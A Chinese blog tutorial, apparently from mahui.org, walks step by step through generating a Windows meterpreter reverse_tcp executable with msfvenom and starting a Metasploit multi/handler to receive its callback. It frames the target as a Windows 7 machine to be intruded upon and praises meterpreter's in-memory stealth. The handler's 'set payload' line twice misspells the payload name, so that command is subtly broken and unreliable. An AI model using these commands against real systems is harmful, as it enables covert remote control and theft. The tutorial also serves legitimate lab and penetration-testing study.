Metasploit利用msfvenom生成被控程序与启动主控端

上一章内容讲述了远程控制程序的原理,本章内容利用kali linux自带的Metasploit来完成被控程序和主控。今天,马会社区( mahui.org )分享的是《Metasploit利用msfvenom生成被控程序与启动主控端》。希望对大家有所帮助。

一、msfvenom命令

Metasploit中的msfvenom是最简单和强大的一款远程控制软件了。几个常见参数如下。

Option:

-p,–payload,<payload>指定要生成的payload(攻击荷载)。如果需要使用自定义的payload,请使用‘-’或者stdin指定。

-f,–format,<format>指定输出格式(可以使用 –help-formats来获取msf支持的输出格式列表)

-o,–out <path>指定存储payload的位置

–payload-options 列举payload的标准选项

–help-formats 查看msf支持的输出格式列表

参数比较多,但是通常我们只是希望生成一个简单的被控端程序,那么只需要使用参数-p、-f和-o即可,分别指定要使用的被控端程序(通常可以使用Metasploit中内置的被控端程序)、要用的平台(Windows、osx等)和保存的位置。

二、kali中生成被控制端程序

在kali linux中直接输入以下命令就可以在root下生成一个payload.exe的被控端文件。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.130.6 lport=5000 -f exe -o /root/payload.exe

下面解释一下每个代码的意思。

msfvenom:Metasploit程序内置的远程控制命令。

-p:指定要生成的payload,即攻击荷载。

windows:适用于Windows系统的。

meterpreter:采用meterpreter主控的。

reverse_tcp lhost:指定接收端host的ip。

lport:指定端口。

-f:指定格式为exe。

-o:指定存储payload位置,即/root/下。

解释一下这句话就是:

最简单的msfvenom命令生成的一个被控制程序,使用的被控端程序就是一个用于Windows平台下的反向远程控制程序:Windows/meterpreter/reverse_tcp,它的参数lhost的值为192.168.130.6,这个ip地址是kali linux的本地ip。

如果操作正确,会得到如下图所示的结果:

msfvenom生成被控程序
msfvenom生成被控程序

生成了,但是找不到文件位置了,所以,就更换了个位置:/home/kali/Desktop/这样子就到桌面上了。

然后把这个文件放到想要入侵的Windows7系统中。

Windows7系统
Windows7系统

三、kali中启动主控端

如果我们在Windows7系统中运行payload.exe的话,这台计算机会立刻回连到192.168.130.6上,不过我们还没有启动主控端,所以,我们需要先启动主控端。

1、启动Metasploit

msfconsole

启动Metasploit
启动Metasploit

2、handler主控端

在Metasploit中使用handler来作为主控端,halder位于exploit下的multi目录下,故启动handler的命令如下:

use exploit/multi/handler

set payload windows/meterpreter/revese_tcp   (这条之前漏了,就没办法执行成功了,这里补上。)

然后进入了handler后,我们需要知道handler需要配置哪些参数,于是,我们输入options来查看需要设置哪些参数。

handler主控端设置
handler主控端设置

Required下面是yes的选项都是必须设置的,之前我们设置的LPORT端口是5000,所以我们现在需要设置为5000,LHOST设置为之前的192.168.130.6。Metasploit下的设置为set命令,即如下一条条执行:

set lhost 192.168.130.6

set lport 5000

设置完成后,再次输入options就可以发现我们已经设置好了。

Metasploit下的设置为set命令
Metasploit下的设置为set命令

最后输入exploit等待对方上线。

exploit

exploit
exploit

上述步骤中漏了一步set之前的payload文件也就是之前的被控端程序,所以开启msf不显示starting the payload handler….

set payload windows/meterpreter/revese_tcp

meterpreter
meterpreter

在Windows7系统中双击payload就可以看到kali中出现了一个session,也就是会话,这表示从现在起,我们可以通过被控制端程序来控制目标计算机了。同时,我们可以看到上图中出现meterpreter,这就是一个被控程序,meterpreter是运行在内存中的,通过注入dll文件实现,在目标计算机的硬盘上不会留下文件痕迹,所以在被入侵时很难找到。

meterpreter操作
meterpreter操作

meterpreter输入ls就可以查看payload.exe文件所在的当前目录有哪些文件,如上图所示。

以上就是马会社区( mahui.org )分享的是《Metasploit利用msfvenom生成被控程序与启动主控端》。感谢您的阅读。

mahui.org 原创文章,仅限技术研究。发布者:马会,转转请注明出处:https://mahui.org/tech/2183.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注